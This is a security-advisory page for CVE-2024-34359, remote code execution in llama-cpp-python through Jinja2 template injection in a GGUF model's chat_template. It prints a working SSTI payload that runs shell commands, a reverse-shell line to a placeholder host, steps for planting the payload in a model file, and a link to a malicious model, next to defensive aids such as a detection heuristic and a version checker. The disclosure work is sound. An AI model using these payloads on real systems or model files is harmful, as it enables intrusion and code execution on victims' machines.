For our exploitation, we first downloaded qwen1_5-0_5b-chat-q2_k.gguf from Qwen/Qwen1.5-0.5B-Chat-GGUF on Hugging Face as the base. After opening the file in a hex-capable editor (in my case, the built-in hex editor of VS Code), you can search for the key chat_template (read as template = self.metadata["tokenizer.chat_template"] in llama-cpp-python):

qwen1_5-0_5b-chat-q2_k.gguf appears to use the original role+message format with jinja2 syntax. We first replaced the original chat_template with \x00 bytes and then inserted our SSTI payload. The payload iterates over the subclasses of the base class of all classes in Python: the expression ().__class__.__base__.__subclasses__() retrieves a list of all subclasses of the basic object class. For each one, it checks whether the class name contains "warning" (if "warning" in x.__name__). If it does, the payload accesses the module held by an instance of that class via the _module attribute, reaches Python's built-in functions through __builtins__, and uses the __import__ function to import the os module. Finally, it calls os.popen to run touch /tmp/retr0reg, which creates an empty file called retr0reg under /tmp/.

{% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen("touch /tmp/retr0reg")}}{%endif%}{% endfor %}
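
The attribute walk in this payload can be reproduced in plain Python without jinja2. The sketch below stops as soon as it has a reference to the os module and runs no command. It assumes CPython, where `warnings.catch_warnings` is a direct subclass of `object` and stores the warnings module in `_module`; unlike the payload, it matches the class name exactly to keep the example deterministic. The function name is hypothetical.

```python
import os
import warnings  # makes sure warnings.catch_warnings has been defined


def resolve_os_via_introspection():
    """Reach the os module starting from an empty tuple, as the payload does."""
    for cls in ().__class__.__base__.__subclasses__():
        if cls.__name__ == "catch_warnings":
            module = cls()._module  # the warnings module object
            builtins_ns = module.__builtins__
            # __builtins__ is a dict for imported modules in CPython,
            # but handle the module form as well.
            if isinstance(builtins_ns, dict):
                importer = builtins_ns["__import__"]
            else:
                importer = builtins_ns.__import__
            return importer("os")
    return None


print(resolve_os_via_introspection() is os)
```

No import statement or pre-existing global is needed inside the loop, which is why the same chain works from inside a template expression.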

In a real-world exploit, touch /tmp/retr0reg can be replaced with arbitrary commands such as sh -i >& /dev/tcp/<HOST>/<PORT> 0>&1, which opens a reverse shell to the specified host. Here we use touch /tmp/retr0reg to demonstrate that the vulnerability is exploitable.
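
A chat template can also be screened for this style of payload before it is ever rendered. The following is a rough heuristic sketch, not a replacement for sandboxed rendering: it only flags double-underscore attribute names, which ordinary chat templates rarely need, and the names `DUNDER_NAME` and `suspicious_tokens` are made up for this example.

```python
import re

# Matches Python "dunder" names such as __class__ or __import__.
DUNDER_NAME = re.compile(r"__\w+__")


def suspicious_tokens(template: str) -> list[str]:
    """Return the distinct dunder names found in a template, sorted."""
    return sorted(set(DUNDER_NAME.findall(template)))


benign = "{% for m in messages %}{{ m['role'] }}: {{ m['content'] }}{% endfor %}"
probe = "{% for x in ().__class__.__base__.__subclasses__() %}{% endfor %}"

print(suspicious_tokens(benign))
print(suspicious_tokens(probe))
```

A check like this can be evaded by obfuscation (for example, building attribute names through string concatenation), so it is best seen as a triage aid for inspecting downloaded model files.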

After these steps, we have a malicious model with a payload embedded in the chat_template of its metadata, which will be parsed and rendered along this path: llama.py:class Llama:__init__ -> self.chat_handler -> llama_chat_format.py:Jinja2ChatFormatter:__init__ -> self._environment = jinja2.Environment( -> llama_chat_format.py:Jinja2ChatFormatter:__call__ -> self._environment.render(

(The uploaded malicious model file is in https://huggingface.co/Retr0REG/Whats-up-gguf )

from llama_cpp import Llama

# Loading locally:
model = Llama(model_path="qwen1_5-0_5b-chat-q2_k.gguf")
# Or loading from huggingface:
model = Llama.from_pretrained(
    repo_id="Retr0REG/Whats-up-gguf",
    filename="qwen1_5-0_5b-chat-q2_k.gguf",
    verbose=False
)

print(model.create_chat_completion(messages=[{"role": "user","content": "what is the meaning of life?"}]))

Now, when the model is loaded, whether via Llama.from_pretrained or Llama, and then used for chat, the malicious code in the chat_template of the metadata is triggered and executes arbitrary code.

PoC video here: https://drive.google.com/file/d/1uLiU-uidESCs_4EqXDiyKR1eNOF1IUtb/view?usp=sharing

Severity

9.6 (Critical)

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H

JSON

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 0.2.71"
      },
      "package": {
        "ecosystem": "PyPI",
        "name": "llama-cpp-python"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0.2.30"
            },
            {
              "fixed": "0.2.72"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2024-34359"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-76"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2024-05-13T14:10:18Z",
    "nvd_published_at": "2024-05-14T15:38:45Z",
    "severity": "CRITICAL"
  },
  "details": "## Description\n\n`llama-cpp-python` depends on class `Llama` in `llama.py` to load `.gguf` llama.cpp or Latency Machine Learning Models. The `__init__` constructor built in the `Llama` takes several parameters to configure the loading and running of the model. Other than `NUMA, LoRa settings`, `loading tokenizers,` and `hardware settings`, `__init__` also loads the `chat template` from targeted `.gguf` \u0027s Metadata and furtherly parses it to `llama_chat_format.Jinja2ChatFormatter.to_chat_handler()` to construct the `self.chat_handler` for this model. Nevertheless, `Jinja2ChatFormatter` parse the `chat template` within the Metadate with sandbox-less `jinja2.Environment`, which is furthermore rendered in `__call__` to construct the `prompt` of interaction. This allows `jinja2` Server Side Template Injection which leads to RCE by a carefully constructed payload.\n\n## Source-to-Sink\n\n### `llama.py` -\u003e `class Llama` -\u003e `__init__`:\n\n```python\nclass Llama:\n    \"\"\"High-level Python wrapper for a llama.cpp model.\"\"\"\n\n    __backend_initialized = False\n\n    def __init__(\n        self,\n        model_path: str,\n\t\t# lots of params; Ignoring\n    ):\n \n        self.verbose = verbose\n\n        set_verbose(verbose)\n\n        if not Llama.__backend_initialized:\n            with suppress_stdout_stderr(disable=verbose):\n                llama_cpp.llama_backend_init()\n            Llama.__backend_initialized = True\n\n\t\t# Ignoring lines of unrelated codes.....\n\n        try:\n            self.metadata = self._model.metadata()\n        except Exception as e:\n            self.metadata = {}\n            if self.verbose:\n                print(f\"Failed to load metadata: {e}\", file=sys.stderr)\n\n        if self.verbose:\n            print(f\"Model metadata: {self.metadata}\", file=sys.stderr)\n\n        if (\n            self.chat_format is None\n            and self.chat_handler is None\n            and 
\"tokenizer.chat_template\" in self.metadata\n        ):\n            chat_format = llama_chat_format.guess_chat_format_from_gguf_metadata(\n                self.metadata\n            )\n\n            if chat_format is not None:\n                self.chat_format = chat_format\n                if self.verbose:\n                    print(f\"Guessed chat format: {chat_format}\", file=sys.stderr)\n            else:\n                template = self.metadata[\"tokenizer.chat_template\"]\n                try:\n                    eos_token_id = int(self.metadata[\"tokenizer.ggml.eos_token_id\"])\n                except:\n                    eos_token_id = self.token_eos()\n                try:\n                    bos_token_id = int(self.metadata[\"tokenizer.ggml.bos_token_id\"])\n                except:\n                    bos_token_id = self.token_bos()\n\n                eos_token = self._model.token_get_text(eos_token_id)\n                bos_token = self._model.token_get_text(bos_token_id)\n\n                if self.verbose:\n                    print(f\"Using gguf chat template: {template}\", file=sys.stderr)\n                    print(f\"Using chat eos_token: {eos_token}\", file=sys.stderr)\n                    print(f\"Using chat bos_token: {bos_token}\", file=sys.stderr)\n\n                self.chat_handler = llama_chat_format.Jinja2ChatFormatter(\n                    template=template,\n                    eos_token=eos_token,\n                    bos_token=bos_token,\n                    stop_token_ids=[eos_token_id],\n                ).to_chat_handler()\n\n        if self.chat_format is None and self.chat_handler is None:\n            self.chat_format = \"llama-2\"\n            if self.verbose:\n                print(f\"Using fallback chat format: {chat_format}\", file=sys.stderr)\n                \n```\n\nIn `llama.py`, `llama-cpp-python` defined the fundamental class for model initialization parsing (Including `NUMA, LoRa settings`, `loading tokenizers,` 
and stuff ). In our case, we will be focusing on the parts where it processes `metadata`; it first checks if `chat_format` and `chat_handler` are `None` and checks if the key `tokenizer.chat_template` exists in the metadata dictionary `self.metadata`. If it exists, it will try to guess the `chat format` from the `metadata`. If the guess fails, it will get the value of `chat_template` directly from `self.metadata.self.metadata` is set during class initialization and it tries to get the metadata by calling the model\u0027s metadata() method, after that, the `chat_template` is parsed into `llama_chat_format.Jinja2ChatFormatter` as params which furthermore stored the `to_chat_handler()` as `chat_handler`\n\n### `llama_chat_format.py` -\u003e `Jinja2ChatFormatter`:\n\n`self._environment =  jinja2.Environment( -\u003e from_string(self.template) -\u003e self._environment.render(`\n\n```python\nclass ChatFormatter(Protocol):\n    \"\"\"Base Protocol for a chat formatter. A chat formatter is a function that\n    takes a list of messages and returns a chat format response which can be used\n    to generate a completion. 
The response can also include a stop token or list\n    of stop tokens to use for the completion.\"\"\"\n\n    def __call__(\n        self,\n        *,\n        messages: List[llama_types.ChatCompletionRequestMessage],\n        **kwargs: Any,\n    ) -\u003e ChatFormatterResponse: ...\n\n\nclass Jinja2ChatFormatter(ChatFormatter):\n    def __init__(\n        self,\n        template: str,\n        eos_token: str,\n        bos_token: str,\n        add_generation_prompt: bool = True,\n        stop_token_ids: Optional[List[int]] = None,\n    ):\n        \"\"\"A chat formatter that uses jinja2 templates to format the prompt.\"\"\"\n        self.template = template\n        self.eos_token = eos_token\n        self.bos_token = bos_token\n        self.add_generation_prompt = add_generation_prompt\n        self.stop_token_ids = set(stop_token_ids) if stop_token_ids is not None else None\n\n        self._environment = jinja2.Environment(\n            loader=jinja2.BaseLoader(),\n            trim_blocks=True,\n            lstrip_blocks=True,\n        ).from_string(self.template)\n\n    def __call__(\n        self,\n        *,\n        messages: List[llama_types.ChatCompletionRequestMessage],\n        functions: Optional[List[llama_types.ChatCompletionFunction]] = None,\n        function_call: Optional[llama_types.ChatCompletionRequestFunctionCall] = None,\n        tools: Optional[List[llama_types.ChatCompletionTool]] = None,\n        tool_choice: Optional[llama_types.ChatCompletionToolChoiceOption] = None,\n        **kwargs: Any,\n    ) -\u003e ChatFormatterResponse:\n        def raise_exception(message: str):\n            raise ValueError(message)\n\n        prompt = self._environment.render(\n            messages=messages,\n            eos_token=self.eos_token,\n            bos_token=self.bos_token,\n            raise_exception=raise_exception,\n            add_generation_prompt=self.add_generation_prompt,\n            functions=functions,\n            
function_call=function_call,\n            tools=tools,\n            tool_choice=tool_choice,\n        )\n\n```\n\nAs we can see in `llama_chat_format.py` -\u003e `Jinja2ChatFormatter`, the constructor `__init__` initialized required `members` inside of the class; Nevertheless, focusing on this line:\n\n```python\n        self._environment = jinja2.Environment(\n            loader=jinja2.BaseLoader(),\n            trim_blocks=True,\n            lstrip_blocks=True,\n        ).from_string(self.template)\n```\n\nFun thing here: `llama_cpp_python` directly loads the `self.template` (`self.template = template` which is the `chat template` located in the `Metadate` that is parsed as a param) via `jinja2.Environment.from_string(` without setting any sandbox flag or using the protected `immutablesandboxedenvironment `class. This is extremely unsafe since the attacker can implicitly tell `llama_cpp_python` to load malicious `chat template` which is furthermore rendered in the `__call__` constructor, allowing RCEs or Denial-of-Service since `jinja2`\u0027s renderer evaluates embed codes like `eval()`, and we can utilize expose method by exploring the attribution such as `__globals__`, `__subclasses__` of pretty much anything.\n\n```python\n    def __call__(\n        self,\n        *,\n        messages: List[llama_types.ChatCompletionRequestMessage],\n        functions: Optional[List[llama_types.ChatCompletionFunction]] = None,\n        function_call: Optional[llama_types.ChatCompletionRequestFunctionCall] = None,\n        tools: Optional[List[llama_types.ChatCompletionTool]] = None,\n        tool_choice: Optional[llama_types.ChatCompletionToolChoiceOption] = None,\n        **kwargs: Any,\n    ) -\u003e ChatFormatterResponse:\n        def raise_exception(message: str):\n            raise ValueError(message)\n\n        prompt = self._environment.render( # rendered!\n            messages=messages,\n            eos_token=self.eos_token,\n            bos_token=self.bos_token,\n    
        raise_exception=raise_exception,\n            add_generation_prompt=self.add_generation_prompt,\n            functions=functions,\n            function_call=function_call,\n            tools=tools,\n            tool_choice=tool_choice,\n        )\n```\n\n## Exploiting\n\nFor our exploitation, we first downloaded [qwen1_5-0_5b-chat-q2_k.gguf](https://huggingface.co/Qwen/Qwen1.5-0.5B-Chat-GGUF/blob/main/qwen1_5-0_5b-chat-q2_k.gguf) of `Qwen/Qwen1.5-0.5B-Chat-GGUF` on `huggingface` as the base of the exploitation, by importing the file to `Hex-compatible` editors (In my case I used the built-in `Hex editor` or `vscode`), you can try to search for key `chat_template` (imported as `template = self.metadata[\"tokenizer.chat_template\"]` in `llama-cpp-python`):\n\n\u003cimg src=\"https://raw.githubusercontent.com/retr0reg/0reg-uploads/main/img/202405021808647.png\" alt=\"image-20240502180804562\" style=\"zoom: 25%;\" /\u003e\n\n`qwen1_5-0_5b-chat-q2_k.gguf` appears to be using the OG `role+message` and using the fun `jinja2` syntax. By first replacing the original `chat_template` in `\\x00`, then inserting our SSTI payload. We constructed this payload which firstly iterates over the subclasses of the base class of all classes in Python. 
The expression `().__class__.__base__.__subclasses__()` retrieves a list of all subclasses of the basic `object` class and then we check if its `warning` by `if \"warning\" in x.__name__`, if it is , we access its module via the `_module` attribute then access Python\u0027s built-in functions through `__builtins__` and uses the `__import__` function to import the `os` module and finally we called `os.popen` to `touch /tmp/retr0reg`, create an empty file call `retr0reg` under `/tmp/`\n\n```python\n{% for x in ().__class__.__base__.__subclasses__() %}{% if \"warning\" in x.__name__ %}{{x()._module.__builtins__[\u0027__import__\u0027](\u0027os\u0027).popen(\"touch /tmp/retr0reg\")}}{%endif%}{% endfor %}\n```\n\nin real life exploiting instance, we can change `touch /tmp/retr0reg` into arbitrary codes like `sh -i \u003e\u0026 /dev/tcp/\u003cHOST\u003e/\u003cPORT\u003e 0\u003e\u00261` to create a reverse shell connection to specified host, in our case we are using `touch /tmp/retr0reg` to showcase the exploitability of this vulnerability.\n\n\u003cimg src=\"https://raw.githubusercontent.com/retr0reg/0reg-uploads/main/img/202405022009159.png\" alt=\"image-20240502200909127\" style=\"zoom:50%;\" /\u003e\n\nAfter these steps, we got ourselves a malicious model with an embedded payload in `chat_template` of the `metahead`, in which will be parsed and rendered by `llama.py:class Llama:init -\u003e  self.chat_handler `-\u003e `llama_chat_format.py:Jinja2ChatFormatter:init -\u003e  self._environment = jinja2.Environment(` -\u003e ``llama_chat_format.py:Jinja2ChatFormatter:call -\u003e self._environment.render(`\n\n*(The uploaded malicious model file is in https://huggingface.co/Retr0REG/Whats-up-gguf )*\n\n```python\nfrom llama_cpp import Llama\n\n# Loading locally:\nmodel = Llama(model_path=\"qwen1_5-0_5b-chat-q2_k.gguf\")\n# Or loading from huggingface:\nmodel = Llama.from_pretrained(\n    repo_id=\"Retr0REG/Whats-up-gguf\",\n    filename=\"qwen1_5-0_5b-chat-q2_k.gguf\",\n   
 verbose=False\n)\n\nprint(model.create_chat_completion(messages=[{\"role\": \"user\",\"content\": \"what is the meaning of life?\"}]))\n```\n\nNow when the model is loaded whether as ` Llama.from_pretrained` or `Llama` and chatted, our malicious code in the `chat_template` of the `metahead` will be triggered and execute arbitrary code. \n\nPoC video here: https://drive.google.com/file/d/1uLiU-uidESCs_4EqXDiyKR1eNOF1IUtb/view?usp=sharing\n",
  "id": "GHSA-56xg-wfcc-g829",
  "modified": "2024-05-20T22:24:26Z",
  "published": "2024-05-13T14:10:18Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/abetlen/llama-cpp-python/security/advisories/GHSA-56xg-wfcc-g829"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-34359"
    },
    {
      "type": "WEB",
      "url": "https://github.com/abetlen/llama-cpp-python/commit/b454f40a9a1787b2b5659cd2cb00819d983185df"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/abetlen/llama-cpp-python"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "llama-cpp-python vulnerable to Remote Code Execution by Server-Side Template Injection in Model Metadata"
}
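The record above marks versions from 0.2.30 (introduced) up to, but not including, 0.2.72 (fixed) as affected. As a small sketch, that range can be checked against a version string or a local install. The helper names are assumptions for this example, and the parser deliberately handles only plain X.Y.Z strings; versions with pre-release or other suffixes are reported as unknown rather than guessed.

```python
from importlib import metadata

# Bounds taken from the "introduced" and "fixed" events in the record above.
INTRODUCED = (0, 2, 30)
FIXED = (0, 2, 72)


def parse_version(version: str) -> tuple:
    """Parse a plain 'X.Y.Z' version; raises ValueError on non-numeric parts."""
    return tuple(int(part) for part in version.split(".")[:3])


def is_affected(version: str) -> bool:
    """True when INTRODUCED <= version < FIXED."""
    return INTRODUCED <= parse_version(version) < FIXED


def installed_is_affected(package: str = "llama-cpp-python"):
    """Return True/False for the installed package, or None if unknown."""
    try:
        return is_affected(metadata.version(package))
    except (metadata.PackageNotFoundError, ValueError):
        return None


for candidate in ("0.2.29", "0.2.30", "0.2.71", "0.2.72"):
    print(candidate, is_affected(candidate))
print("installed:", installed_is_affected())
```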

FKIE_CVE-2024-34359

Vulnerability from fkie_nvd - Published: 2024-05-14 15:38 - Updated: 2024-11-21 09:18

Severity

9.6 (Critical) - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H

References

	Source	URL
	security-advisories@github.com	https://github.com/abetlen/llama-cpp-python/commit/b454f40a9a1787b2b5659cd2cb00819d983185df
	security-advisories@github.com	https://github.com/abetlen/llama-cpp-python/security/advisories/GHSA-56xg-wfcc-g829
	af854a3a-2127-422b-91ae-364da2661108	https://github.com/abetlen/llama-cpp-python/commit/b454f40a9a1787b2b5659cd2cb00819d983185df
	af854a3a-2127-422b-91ae-364da2661108	https://github.com/abetlen/llama-cpp-python/security/advisories/GHSA-56xg-wfcc-g829

Impacted products

	Vendor	Product	Version

JSON

{
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "llama-cpp-python is the Python bindings for llama.cpp. `llama-cpp-python` depends on class `Llama` in `llama.py` to load `.gguf` llama.cpp or Latency Machine Learning Models. The `__init__` constructor built in the `Llama` takes several parameters to configure the loading and running of the model. Other than `NUMA, LoRa settings`, `loading tokenizers,` and `hardware settings`, `__init__` also loads the `chat template` from targeted `.gguf` \u0027s Metadata and furtherly parses it to `llama_chat_format.Jinja2ChatFormatter.to_chat_handler()` to construct the `self.chat_handler` for this model. Nevertheless, `Jinja2ChatFormatter` parse the `chat template` within the Metadate with sandbox-less `jinja2.Environment`, which is furthermore rendered in `__call__` to construct the `prompt` of interaction. This allows `jinja2` Server Side Template Injection which leads to remote code execution by a carefully constructed payload."
    },
    {
      "lang": "es",
      "value": "llama-cpp-python son los enlaces de Python para llama.cpp. `llama-cpp-python` depende de la clase `Llama` en `llama.py` para cargar `.gguf` llama.cpp o modelos de aprendizaje autom\u00e1tico de latencia. El constructor `__init__` integrado en `Llama` toma varios par\u00e1metros para configurar la carga y ejecuci\u00f3n del modelo. Adem\u00e1s de `NUMA, configuraci\u00f3n de LoRa`, `carga de tokenizadores` y `configuraci\u00f3n de hardware`, `__init__` tambi\u00e9n carga la `plantilla de chat` desde los metadatos `.gguf` espec\u00edficos y adem\u00e1s la analiza en `llama_chat_format.Jinja2ChatFormatter.to_chat_handler ()` para construir el `self.chat_handler` para este modelo. Sin embargo, `Jinja2ChatFormatter` analiza la `plantilla de chat` dentro del Metadate con `jinja2.Environment` sin zona de pruebas, que adem\u00e1s se representa en `__call__` para construir el `mensaje` de interacci\u00f3n. Esto permite la inyecci\u00f3n de plantilla del lado del servidor `jinja2`, lo que conduce a la ejecuci\u00f3n remota de c\u00f3digo mediante un payload cuidadosamente construida."
    }
  ],
  "id": "CVE-2024-34359",
  "lastModified": "2024-11-21T09:18:30.130",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 9.6,
          "baseSeverity": "CRITICAL",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "NONE",
          "scope": "CHANGED",
          "userInteraction": "REQUIRED",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 2.8,
        "impactScore": 6.0,
        "source": "security-advisories@github.com",
        "type": "Secondary"
      }
    ]
  },
  "published": "2024-05-14T15:38:45.093",
  "references": [
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/abetlen/llama-cpp-python/commit/b454f40a9a1787b2b5659cd2cb00819d983185df"
    },
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/abetlen/llama-cpp-python/security/advisories/GHSA-56xg-wfcc-g829"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "https://github.com/abetlen/llama-cpp-python/commit/b454f40a9a1787b2b5659cd2cb00819d983185df"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "https://github.com/abetlen/llama-cpp-python/security/advisories/GHSA-56xg-wfcc-g829"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Awaiting Analysis",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-76"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Secondary"
    }
  ]
}
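The baseScore of 9.6, exploitabilityScore of 2.8, and impactScore of 6.0 in the record above follow from the vector string through the CVSS v3.1 base-score equations. The sketch below reproduces that arithmetic; the metric weights and the roundup rule are those of the CVSS v3.1 specification, while the function and variable names are chosen for this example.

```python
import math

# Metric weights from the CVSS v3.1 specification.
AV = {"N": 0.85, "A": 0.62, "L": 0.55, "P": 0.2}
AC = {"L": 0.77, "H": 0.44}
PR_UNCHANGED = {"N": 0.85, "L": 0.62, "H": 0.27}
PR_CHANGED = {"N": 0.85, "L": 0.68, "H": 0.5}
UI = {"N": 0.85, "R": 0.62}
CIA = {"H": 0.56, "L": 0.22, "N": 0.0}


def roundup(value: float) -> float:
    """Round up to one decimal place, as defined in CVSS v3.1."""
    scaled = round(value * 100000)
    if scaled % 10000 == 0:
        return scaled / 100000.0
    return (math.floor(scaled / 10000) + 1) / 10.0


def base_score(vector: str):
    """Return (base, exploitability, impact) for a CVSS:3.1 base vector."""
    metrics = dict(part.split(":") for part in vector.split("/")[1:])
    changed = metrics["S"] == "C"
    pr = PR_CHANGED if changed else PR_UNCHANGED
    exploitability = (8.22 * AV[metrics["AV"]] * AC[metrics["AC"]]
                      * pr[metrics["PR"]] * UI[metrics["UI"]])
    iss = 1 - ((1 - CIA[metrics["C"]]) * (1 - CIA[metrics["I"]])
               * (1 - CIA[metrics["A"]]))
    if changed:
        impact = 7.52 * (iss - 0.029) - 3.25 * (iss - 0.02) ** 15
    else:
        impact = 6.42 * iss
    if impact <= 0:
        base = 0.0
    elif changed:
        base = roundup(min(1.08 * (impact + exploitability), 10))
    else:
        base = roundup(min(impact + exploitability, 10))
    return base, round(exploitability, 1), round(impact, 1)


print(base_score("CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"))
```

For this vector the unrounded values are roughly 2.84 for exploitability and 6.05 for impact, so 1.08 × (6.05 + 2.84) ≈ 9.59, which rounds up to 9.6.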

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.
